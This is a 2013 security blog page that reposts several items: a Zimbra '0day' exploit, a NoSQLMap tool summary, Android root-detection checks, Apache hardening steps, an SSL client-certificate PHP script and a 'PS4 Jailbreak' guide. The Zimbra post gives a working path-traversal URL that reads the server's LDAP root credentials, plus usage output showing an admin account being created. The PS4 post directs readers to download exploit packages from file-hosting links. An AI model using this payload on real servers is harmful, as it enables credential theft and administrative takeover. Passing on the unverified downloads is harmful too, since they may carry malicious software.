Dec 7, 2013

Tools: Zimbra 0day - LFI

# Exploit Title: Zimbra 0day exploit / Privilegie escalation via LFI
# Date: 06 Dec 2013
# Exploit Author: rubina119
# Contact Email : rubina119[at]gmail.com
# Vendor Homepage: http://www.zimbra.com/
# Version: 2009, 2010, 2011, 2012 and early 2013 versions are afected,
# Tested on: Centos(x), Ubuntu.
# CVE : No CVE, no patch just 0Day
# State : Critical

# Mirror: http://www.exploit-db.com/sploits/zimbraexploit_rubina119.zip

---------------Description-----------------

This script exploits a Local File Inclusion in
/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz
which allows us to see localconfig.xml
that contains LDAP root credentials wich allow us to make requests in
/service/admin/soap API with the stolen LDAP credentials to create user
with administration privlegies
and gain acces to the Administration Console.

LFI is located at :
/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml

Example :

https://mail.example.com/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml

or

https://mail.example.com:7071/zimbraAdmin/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml


----------------Exploit-----------------


Before use this exploit, target server must have admin console port open
"7071" otherwise it won't work.

use the exploit like this :


ruby run.rb -t mail.example.com -u someuser -p Test123_23

[*] Looking if host is vuln....
[+] Host is vuln exploiting...
[+] Obtaining Domain Name
[+] Creating Account
[+] Elevating Privileges
[+] Login Credentials
    [*] Login URL : https://mail.example.com:7071/zimbraAdmin/
    [*] Account   : someuser@example.com
    [*] Password  : Test123_23
[+] Successfully Exploited !

The number of servers vuln are huge like 80/100.

This is only for educational purpouses.
 
Source: http://www.exploit-db.com/exploits/30085/ 


If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Dec 6, 2013

VIdeos: AppSecUSA 2013





If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Tools: NOSQLMap - SQLMap for nosql database

What is NoSQLMap?

NoSQLMap is an open source Python tool designed to audit for as well as automate injection attacks and exploit default configuration weaknesses in NoSQL databases, as well as web applications using NoSQL in order to disclose data from the database.  It is named as a tribute to Bernardo Damele and Miroslav's Stampar's popular SQL injection tool SQLmap, and its concepts are based on and extensions of Ming Chow's excellent presentation at Defcon 21, "Abusing NoSQL Databases".  Presently the tool's exploits are focused around MongoDB, but additional support for other NoSQL based platforms such as CouchDB, Redis, and Cassandra are planned in future releases; right now the goal is to provide a proof of concept tool to debunk the premise that NoSQL is impervious to SQL injection attacks.


Features

  • Automated MongoDB database enumeration and cloning attacks.
  • PHP application parameter injection attacks against MongoClient to return all database records.
  • Javascript function variable escaping and arbitrary code injection to return all database records.
  • Timing based attacks similar to blind SQL injection to validate Javascript injection vulnerabilities with no feedback from the application.
  • More coming soon!
Source: http://nosqlmap.net/


If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Dec 5, 2013

Howto: Android Root Detection Technique

Default Files & Configurations

The first root detection checks are for default files and configurations that should be present on a non-rooted device. These may also be present in rooted devices with non-custom roms. 
  1. Checking the BUILD tag for test-keys. By default, stock Android ROMs from Google are built with release-keys tags. If test-keys are present, this can mean that the Android build on the device is either a developer build or an unofficial Google build. My Nexus 4 is running stock Android from Google's (Android Open Source Project) AOSP. This is why my build tags show release-keys.

  2. root@android:/ # cat /system/build.prop | grep ro.build.tags
    ro.build.tags=release-keys
  1. Checking for Over The Air (OTA) certs. By default, Android is updated OTA using public certs from Google. If the certs are not there, this usually means that there is a custom ROM installed which is updated through other means. My Nexus 4 has no custom ROM and is updated through Google. Updating my device however, will probably break root.

  2. root@android:/ # ls -l /etc/security/otacerts.zip
    ls -l /etc/security/otacerts.zip
    -rw-r--r-- root     root         1733 2008-08-01 07:00 otacerts.zip

Installed Files & Packages

There are many files and packages that MDMs look for when detecting if a device is rooted. I have compiled a list of ones that I know for sure are being detected.
  1. Superuser.apk. This package is most often looked for on rooted devices. Superuser allows the user to authorize applications to run as root on the device.
  1. Other packages. The following list of packages are often looked for as well. The last two facilitate in temporarily hiding the su binary and disabling installed applications.

  2. com.noshufou.android.su
    com.thirdparty.superuser
    eu.chainfire.supersu
    com.koushikdutta.superuser
    com.zachspong.temprootremovejb
    com.ramdroid.appquarantine
    The following command lists packages that are currently installed on your device.
  3. root@android:/ # pm list packages
    package:com.android.backupconfirm
    package:com.android.bluetooth
    package:com.android.browser.provider
    package:com.android.calculator2
    package:eu.chainfire.supersu

  4. Any chainfire package. One MDM looks for any package that is developed by chainfire. The most notable one being SuperSU. 

  5. Cyanogenmod.superuser. If the Cyanogenmod ROM is installed, the cyanogenmod.superuser activity may be in the com.android.settings package. This can be detected by listing the activities within com.android.settings.

  6. Su Binaries. The following list of Su binaries are often looked for on rooted devices.

  7. /system/bin/su
    /system/xbin/su
    /sbin/su
    /system/su
    /system/bin/.ext/.su
    /system/usr/we-need-root/su-backup
    /system/xbin/mu

Directory Permissions

Sometimes when a device has root, the permissions are changed on common directories. I have never seen this personally, but it is being checked for.
  1. Are the following directories writable.

  2. /data
    /
    /system
    /system/bin
    /system/sbin
    /system/xbin
    /vendor/bin
    /sys
    /sbin
    /etc
    /proc
    /dev

  3. Can we read files in /data. The /data directory contains all the installed application files. By default, /data is not readable.

Commands

A few MDMs execute common commands to detect if a device is rooted.
  1. Su. Execute su and then id to check if the current user has a uid of 0 or if it contains (root). 

  2. shell@android:/ $ su
    shell@android:/ # id
    uid=0(root) gid=0(root) groups=1003(graphics),1004(input),1007(log),1009(mount),1011(adb),1015(sdcard_rw),1028(sdcard_r)

  3. Busybox. If a device has been rooted, more often then not Busybox has been installed as well. Busybox is a binary that provides many common linux commands. Running Busybox is a good indication that a device has been rooted.

  4. root@android:/ # busybox df
    Filesystem           1K-blocks      Used Available Use% Mounted on
    tmpfs                   958500        32    958468   0% /dev
    tmpfs                   958500         0    958500   0% /mnt/secure
    tmpfs                   958500         0    958500   0% /mnt/asec
    tmpfs                   958500         0    958500   0% /mnt/obb
     

Source: https://www.netspi.com/blog/entryid/209/android-root-detection-techniques



If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Howto: Secure your Apache server from DDoS, Slowloris, and DNS Injection attacks

DDoS

There is an Apache module that was created to prevent a DDoS attack, although it's probably not installed by default. Follow these steps to install the module.
1. Open your terminal window.
2. Issue the command sudo apt-get -y install libapache2-mod-evasive.
3. Issue the command sudo mkdir -p /var/log/apache2/evasive.
4. Issue the command sudo chown -R www-data:root /var/log/apache2/evasive.
5. Open the /ete/apache2/mods-available/mod-evasive.load file (using sudo and your favorite text editor) and append the following to the bottom of that file (this is one configuration per line):
DOSHashTableSize 2048
DOSPageCount 20  # maximum number of requests for the same page
DOSSiteCount 300  # total number of requests for any object by the same client IP on the same listener
DOSPageInterval 1.0 # interval for the page count threshold
DOSSiteInterval 1.0  # interval for the site count threshold
DOSBlockingPeriod 10.0 # time that a client IP will be blocked for
DOSLogDir “/var/log/apache2/evasive”
DOSEmailNotify admin@domain.com
6. Save the file and restart Apache.
You should now be better protected from DDoS attacks.

Slowloris

Slowloris is software written by Robert Hansen that allows one machine to take down another machine's web server using minimal bandwidth. Apache has a module to help prevent such attacks. Here's how to get it working for you.
1. Open a terminal window.
2. Issue the command sudo apt-get -y install libapache2-mod-qos.
After the installation is complete, check the configuration in /etc/apache2/mods-available/qos.conf to make sure it perfectly fits your needs. After you tweak the module (if necessary), restart Apache and enjoy a Slowloris-free web server.

DNS Injection

Spam from web forms is not only prevalent, it's a fast-track method of getting your domain blacklisted by the likes of Spamhaus. To prevent DNS Injection attacks, which are attacks that can inject fake DNS names into your server's cache, you need to add another module to Apache. Follow these steps.
1. Open a terminal window.
2. Issue the command sudo apt-get -y install libapache2-mod-spamhaus.
3. After the installation completes, issue the command sudo touch /etc/spamhaus.wl.
4. With the module installed, open the /etc/apache2/apache2.conf file (using sudo and your favorite text editor) and append the following to the bottom of your configuration file:
<IfModule mod_spamhaus.c>
  MS_METHODS POST,PUT,OPTIONS,CONNECT 
  MS_WhiteList /etc/spamhaus.wl 
  MS_CacheSize 256 
</IfModule>
5. Save the apache2.conf file and restart Apache so the new module will take effect.


Source: http://www.techrepublic.com/blog/smb-technologist/secure-your-apache-server-from-ddos-slowloris-and-dns-injection-attacks/



If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Dec 4, 2013

Howto: Fix Problem scrolling in WebBrowser after Mavericks upgrade

After I upgraded my Macbook Pro 2012 to the latest Mac OS X, Marvericks. I have a problem that when I use Firefox, I can't scrolling. So this post use to remind me how to fix it.

disabling the "Swipe between pages" options for both the Mouse and Trackpad in System Preferences 
- Restart Firefox 
- System Preferences, General and Next to "Show Scroll Bar", click "Always"
 




If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Free Python eBook

Think Python http://www.greenteapress.com/thinkpython/thinkpython.pdf
 Learn Python the Hard way, 3rd edition http://learnpythonthehardway.org/book/
Advance Python Features Gone Bad http://lse.epita.fr/lse-summer-week-2013/slides/lse-summer-week-2013-25-Franck%20Michea-Clement%20Raoult-Advanced%20Python%20Features%20Gone%20Bad.pdf
Invent Your Own Computer Game With Python http://inventwithpython.com/IYOCGwP_book1.pdf
Hacking Secret Ciphers With Python http://inventwithpython.com/hackingciphers.pdf

 

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Dec 3, 2013

Tools: Orchid - Tor Client for Java

In a basic use case, running Orchid will open a SOCKS5 listener which can be used as a standalone client where Tor would otherwise be used.

Orchid can also be used as a library by any application running on the JVM. This is what Orchid was really designed for and this is the recommended way to use it. Orchid can be used as a library in any Java application, or any application written in a language that compiles bytecode that will run on the Java virtual machine, e.g., JRuby, Clojure, Scala..

Why was Orchid developed?

Orchid was developed for seamless integration of Tor into Java applications. The first application to have built-in Tor support is Martus, a human rights application developed by Benetech.

Another reason Orchid was developed was to work through and debug the Tor specification documents. Orchid was also created to provide a reference implementation in Java. This may be easier to understand for those who are unfamiliar with the C programming language. The implementation is also simpler because only the client has been implemented.

Should Orchid be used with a regular browser for anonymous browsing?

Probably not. We recommend that the Tor Browser Bundle (or better yet, Tails) be used, as there are privacy leaks through the browser that are unrelated to Tor. However, Orchid can be used with the Tor Browser bundle in the place of native Tor.

Orchid's strength is that it can be used to Torify Java and JVM applications with near transparency.



Source: http://www.subgraph.com/orchid.html


If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Dec 2, 2013

Tools: SQL injection test environment


A collection of web pages vulnerable to SQL injection flaws and more:

Source: https://github.com/sqlmapproject/testenv


If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Howto: Adding Easy SSL Client Authentication To Any Webapp

If you want to know and read full detail, please go to the Source.

1. Create a root CA for your application
mkdir /etc/apache2/ssl.crt/
cd /etc/apache2/ssl.crt/
openssl genrsa -out rootCA.key 2048
openssl req -x509 -new -nodes -key rootCA.key -days 7300 -out rootCA.pem
Fill in appropriate values as prompted.
cp rootCA.pem ca-bundle.crt
2. Enable SSL on Apache
cd /etc/apache2/sites-enabled/
ln -s ../sites-available/default-ssl.conf
a2enmod ssl
If you purchased a cert, you could install that now.
Then edit /etc/apache2/sites-available/default-ssl.conf with your favorite editor and uncomment the line “SSLCACertificateFile /etc/apache2/ssl.crt/ca-bundle.crt” which tells the web server to respect your CA.

sed -i.bak 's/#SSLCACertificateFile/SSLCACertificateFile/' /etc/apache2/sites-available/default-ssl.conf
Make sure there is a line “SSLOptions +StdEnvVars” (should be there by default, add if necessary)
And since we also want to allow use of .htaccess files, (although you could put all the directives in the apache conf files instead of .htaccess)

sed -i.bak 's/AllowOverride None/AllowOverride All/g' /etc/apache2/apache2.conf
service apache2 restart
Now you can go visit https://1.2.3.4/ or whatever your server’s IP is to verify it works
3. Set up client auth on a directory
mkdir /var/www/auth
cd /var/www/auth
echo ' index.php
echo SSLVerifyClient optional > .htaccess
echo SSLVerifyDepth 1 >> .htaccess
Now go visit https://1.2.3.4/auth or whatever your server’s IP is, and in the
“Apache Environment” section you should see SSL_CLIENT_VERIFY None

4. Create an openssl CA configuration file and CA directory. To keep our web app more
self-contained, we’ll create this as an inaccessible subdirectory of it.
4.1 Create the directory

mkdir /var/www/auth/ca/
cd /var/www/auth/ca/
touch index.txt
mkdir newcerts
echo 1000 > serial
echo Deny from all > .htaccess
chown -R www-data .
4.2 Save this file as /var/www/auth/ca/ca.conf
[ ca ]
default_ca      = CA_default
[ CA_default ]
dir            = /var/www/auth/ca/
database       = $dir/index.txt
new_certs_dir  = $dir/newcerts
certificate    = /etc/apache2/ssl.crt/rootCA.pem
serial         = $dir/serial
private_key    = /etc/apache2/ssl.crt/rootCA.key
RANDFILE       = $dir/private/.rand
default_days   = 3650
default_crl_days= 60
default_md     = sha1
policy         = policy_any
email_in_dn    = yes
name_opt       = ca_default
cert_opt       = ca_default
copy_extensions = none
[ policy_any ]
countryName            = supplied
stateOrProvinceName    = optional
organizationName       = optional
organizationalUnitName = optional
commonName             = supplied
emailAddress           = optional
5. Create a certificate generation page. It must display a keygen form, receive submitted certificate requests, then generate and send the client certificate back. Save this example page as /var/www/getacert.php:
<?php
//Should not happen since this should be in a directory that does not ask for client certificates
if($_SERVER['SSL_CLIENT_S_DN_CN'])
 die("You are already authenticated as ".$_SERVER["SSL_CLIENT_S_DN_CN"]);
date_default_timezone_set('UTC');
$CAorg = 'MyApp';
$CAcountry = 'US';
$CAstate = 'CA';
$CAcity = 'Sacramento';
$confpath = '/var/www/auth/ca/ca.conf';
$cadb = '/var/www/auth/ca/index.txt'; //will need to be reset
$days = 3650;
if($_SERVER['REQUEST_METHOD'] == 'POST'){
  $f = fopen($cadb, 'w'); //reset CA DB
  fclose($f);
  $uniqpath = tempnam('/tmp/','certreq');
  $username = $_POST['username']; //Validate this first!
  $CAmail = "test@example.com"; //This too! Make sure that's their email.
//If they're submitting a key, first save it to an spkac file
  $key = $_POST['pubkey'];
  if (preg_match('/\s/',$username) || preg_match('/\s/',$CAmail))
    die("Must not have whitespace in username or email!");
  $keyreq = "SPKAC=".str_replace(str_split(" \t\n\r\0\x0B"), '', $key);
  $keyreq .= "\nCN=".$username;
  $keyreq .= "\nemailAddress=".$CAmail;
  $keyreq .= "\n0.OU=".$CAorg." client certificate";
  $keyreq .= "\norganizationName=".$CAorg;
  $keyreq .= "\ncountryName=".$CAcountry;
  $keyreq .= "\nstateOrProvinceName=".$CAstate;
  $keyreq .= "\nlocalityName=".$CAcity;
  file_put_contents($uniqpath.".spkac",$keyreq);
//Now sign the file 
  $command = "openssl ca -config ".$confpath." -days ".$days." -notext -batch -spkac ".$uniqpath.".spkac -out ".$uniqpath.".out 2>&1";
  $output = shell_exec($command);
//And send it back to the user
  $length = filesize($uniqpath);
  header('Last-Modified: '.date('r+b'));
  header('Accept-Ranges: bytes');
  header('Content-Length: '.$length);
  header('Content-Type: application/x-x509-user-cert');
  readfile($uniqpath.".out");
  unlink($uniqpath.".out");
  unlink($uniqpath.".spkac");
  unlink($uniqpath);
  exit;
}
?>
<!DOCTYPE html>
<html>
<h1>Let's generate you a cert so you don't have to use a password!</h1>
 Hit the Generate button and then install the certificate it gives you in your browser.
 All modern browsers (except for Internet Explorer) should be compatible.
 <form method="post">
   <keygen name="pubkey" challenge="randomchars">
   The username I want: <input type="text" name="username" value="Alice">
   <input type="submit" name="createcert" value="Generate">
 </form>
 <strong>Wait a minute, then refresh this page over HTTPS to see your new cert in action!</strong>
</html> 
 
Source: http://www.scriptjunkie.us/2013/11/adding-easy-ssl-client-authentication-to-any-webapp/ 




If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Dec 1, 2013

Howto: PS4 Jailbreak!!!

-EXPLOIT DETAILS-
OS: Orbis
Console: PlayStation 4
Type: Privilege Escalation/Buffer Overflow (allows to run assigned code)
Created on: 25 November 2013
 
-AUTHOR-
Name: x-s4nd3r
URL: http://twitter.com/xs4nd3r (feel free to get him v&)
 
 
FILES:
 
PS4 DevKit: https://depositfiles.com/files/deitivkle
Jailbreak Package (exploit): https://depositfiles.com/files/xwurigoq
 
***IMPORTANT***** - You need the DAY ONE Update to jailbreak the PS4, otherwise these files will be considered unrecognizable.
 
GUIDE:
 
1. Create a folder on your USB storage device. This is where you'll put the exploit.
 
2. Create a "SANDERPS4" folder. Inside that folder, create another folder named "EXP."
 
3. Extract the PSORBISEXP.PUP file from the package, and save it in the EXP folder.
 
4. Make sure your PlayStation 4 is turned off.
 
5. Connect the USB storage device to your PlayStation 4, and press the power button for at least 7 seconds. The PlayStation 4 will start in Safe Mode.
 
6. Select "Update System Software."
 
7. Follow the on-screen instructions to install the jailbreak.
 
8. If your PlayStation 4 doesn't recognize the jailbreaking file, make sure that the folder and file names are correct.
 
9. Voila! JAILBROKEN!
 
 
Source: http://pastebin.com/QDeRQiMY



If you like my blog, Please Donate Me
Or Click The Banner For Support Me.
 

Sponsors

lusovps.com

Blogroll

About

 Please subscribe my blog.

 Old Subscribe

Share |